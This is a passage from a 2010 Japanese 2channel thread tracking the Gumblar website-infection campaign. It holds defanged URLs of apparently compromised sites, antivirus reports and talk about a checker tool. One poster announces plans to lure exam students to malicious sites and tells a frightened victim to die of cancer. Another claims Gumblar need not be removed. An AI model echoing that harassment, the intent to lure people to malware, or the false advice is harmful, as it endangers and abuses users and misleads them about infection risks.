952 名前：名無しさん＠お腹いっぱい。 [2010/02/18(木) 17:14:25 ]: >>941
巨大クリトリスが・・・
953 名前：（＇д＇） ◆yUyb3Tqn92 mailto:踏ませ師 [2010/02/18(木) 17:15:10 ]: >>944
(＇д＇)日本語は？喋れない系？
954 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 17:17:13 ]: シナ人だろJK
955 名前：名無しさん＠お腹いっぱい。 [2010/02/18(木) 17:23:53 ]: www●sira036●com
www●curry-dream●com
34di●mecha-kawa●com
www●dgnx●net
coolfocus●jp/seminar/heartful

デジロック
956 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 17:28:53 ]: >>941
●の正しい使い方を覚えて出直してきてね。
957 名前：名無しさん＠お腹いっぱい。 [2010/02/18(木) 17:34:25 ]: >>941
このクリトリスは偽者かな？
958 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 17:45:07 ]: >>949
別のスレでガンブラーにやられたって聞いたんだ
で、告知してなかったって…
959 名前：へたれ発掘屋 mailto:sage [2010/02/18(木) 18:06:02 ]: とりあえず1コ投下
//www●tako45●com/netu/

新スレまだー？
960 名前：へたれ発掘屋 mailto:sage [2010/02/18(木) 18:07:52 ]: ↑のやつは>>938で既出だったorz
961 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 18:08:07 ]: >>958
別スレは信用せずにここのスレは信用すんの？
962 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 19:24:35 ]: internet.watch.impress.co.jp/docs/special/20100218_349110.html
963 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 19:36:36 ]: >>962
Gubmler攻撃で使用された転送先不正Webサイトのうちの実に96％を検出し、アクセスをブロックすることが可能だったという実績を上げている（2009年11月のデータ）。
＞（2009年11月のデータ）。
964 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 19:40:42 ]: 年明けからいろいろ変ったよねー？
965 名前：（＇д＇） ◆yUyb3Tqn92 mailto:踏ませ師 [2010/02/18(木) 19:51:12 ]: ヽ(＇д＇)ﾉ今度受験生に踏ませてみようっと♪
966 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 21:00:37 ]: テンプレ勝手に変えちゃった
ｽﾏｿ

次スレ
pc11.2ch.net/test/read.cgi/sec/1266494350/
967 名前：名無しさん＠お腹いっぱい。 mailto:age [2010/02/18(木) 21:28:39 ]: テンプレ最低限のしか書いてないから、あとの補足をよろしく
たぶん変更点もあるだろうし

そしてChecker 3 のhを抜き忘れたorz

では、通報作業に戻りまつ　ﾉ
968 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 21:39:56 ]: OpenOfficeにＪＲＥ版があるんだけど使わない方がいいの？
969 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 21:44:34 ]: テンプレはこんだけでいいよ
970 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 22:44:49 ]: >>963
Gumblar.xが攻撃を停止してたときのデータじゃね？
971 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 22:54:08 ]: >>968
JRE版なんかない。ダウンロードページをよく読め
972 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 23:43:08 ]: >>968
JAVA無しだとごく一部の機能が使えなくなるな。
まあ、普通に表計算するだけなら要らないよ。
マクロとか使ってドップリ使うならJREもいれとかないとダメ。
973 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 02:46:42 ]: >>963
この手の攻撃は「100%」防げないと無意味
974 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 04:17:28 ]: そろそろ寝ようかって思ってた時に、アバストがJS:Illredir-R [Trj]の警告を出してきて
いろいろやっててこんな時間になったよ
とりあえずテンプレに書いてくれてることをやって
アバストのスキャン→シマンテックのオンラインスキャン→アバストのブートタイム検査をして
パケットの動作状況の監視をしばらくやって、勝手な通信はしてないことは確認できたけど
まだ不安でたまらんわ
こんなウィルスを作った奴は前身からスルメ臭がするようになっちまえ
975 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 07:05:24 ]: >>974
avastは去年発狂してから使ってないけど最近はだいじょうぶなの？
今はAvira使ってるけど仕事してるのかわからないくらいおとなしいんだけど・・・。
976 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 09:15:04 ]: IEに「同期」ってあるけど、
ウイルス検出ソフトを導入しているPCで
WEBサイトが感染しているかどうか判断する時
WEBサイトを「同期」でリンク先も含めテンポラリにキャプチャして
テンポラリをウイルス検出ソフトでチェック、
検出されたら感染サイト！という判定でおｋ？
977 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 09:37:05 ]: Adobe Flash Player 10.0.45.2
978 名前：名無しさん＠お腹いっぱい。 [2010/02/19(金) 09:53:46 ]: hout●kanji2003●com
979 名前：（＇д＇） ◆yUyb3Tqn92 mailto:踏ませ師 [2010/02/19(金) 09:54:42 ]: >>974
＞まだ不安でたまらんわ

(＇Д＇)ブハハハハハ！！！
ざまーみろ情弱死ね！(＞ｗ＜)！笑えるwwwwwwwww
ウィルスに感染してしまうようなお前が低脳なだけ

(＇Д＇)その不安が原因で癌細胞増やしてさっさと死ねっ！！！！！
980 名前：（＇д＇） ◆yUyb3Tqn92 mailto:踏ませ師 [2010/02/19(金) 09:56:12 ]: こうやってただでさえ不安とイライラで胸いっぱいの人間に
更に止めを刺すのって楽しいよね(*＇д＇*)ウフフフフフフフフwwww
981 名前：名無しさん＠お腹いっぱい。 [2010/02/19(金) 10:13:01 ]: www●win-win777●com
hanahaitatsu●com
982 名前：名無しさん＠お腹いっぱい。 [2010/02/19(金) 16:29:13 ]: おまえら勢いが足りないぞ
983 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 17:13:03 ]: オンラインスキャンしようとすると
正しく機能しないアドオンまたは悪意のあるアドオンが存在するため、Internet Explorer はこの Web ページを閉じました。
って言われるんだが、なぜ？
どこのも出来ない
984 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 17:14:00 ]: >>938
サポート掲示板に書き込みが無くなり
サポートメール打ってもテンプレしか返ってこず
クラックされても不具合あっても鯖のデータ飛んでも対応が1週間以上経ってからとかデフォ

でも値段が安いのにデータベースの数やマルチドメインやら
スペックが非常に高いので他の鯖屋に移れない
ホントxreaとcoreserverは地獄だぜぇ～ﾌｩｩﾊｧｧｧｧｧ～
985 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 17:18:13 ]: 毎度。
www●geocities●jp/agasa21inc/

Avast!で検出できた
986 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 17:22:15 ]: Gumblar Checker 3でコード表示機能が動作しなくなっていたので修正しました。

gumblar.s1.dynamitelife.net/ver3/
987 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 17:23:56 ]: www.kagoo-livingroom.com●sofabed●catalog_living_sofabed●iving_sofabed_u2005da14bk.html
988 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 17:32:29 ]: >>986
しなくなっていたって何？
989 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 17:35:58 ]: なんかたびたび消えてたとか○○になってたとかあるんだけど……
990 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 17:39:15 ]: >>988
ちょっと意味が分かりにくかったですね、すいません。
正しくは動作「していなかった」です。
991 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 17:39:51 ]: ちなみにこれは自分のコード記述ミスです。
992 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 18:00:06 ]: >>991
いつもありがとです。
993 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 18:09:26 ]: ガンブラー感染するとどんな症状出る？
オンラインスキャン出来ないわ
994 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 18:20:28 ]: ソフマップ.comのトップページに

「ガンブラー対策なら”防御力No.1”の実力！「ウイルスバスター2010」がおすすめです！」

って書いてあった。
995 名前：名無しさん＠お腹いっぱい。 [2010/02/19(金) 18:25:19 ]: >>993
ガンブラーウイルスをもらっても
別に駆除しなくても平気だと聞きましたから
どうってことないですよ
どうせ２ちゃん専用パソコンなんでしょ
996 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 18:40:23 ]: 996
997 名前：名無しさん＠お腹いっぱい。 [2010/02/19(金) 18:43:33 ]: 997
998 名前：名無しさん＠お腹いっぱい。 [2010/02/19(金) 18:52:12 ]: 998
999 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 18:53:15 ]: ガンブラーなんて怖くないもん
1000 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/19(金) 18:53:17 ]: 999
1001 名前：１００１ [Over 1000 Thread]: このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef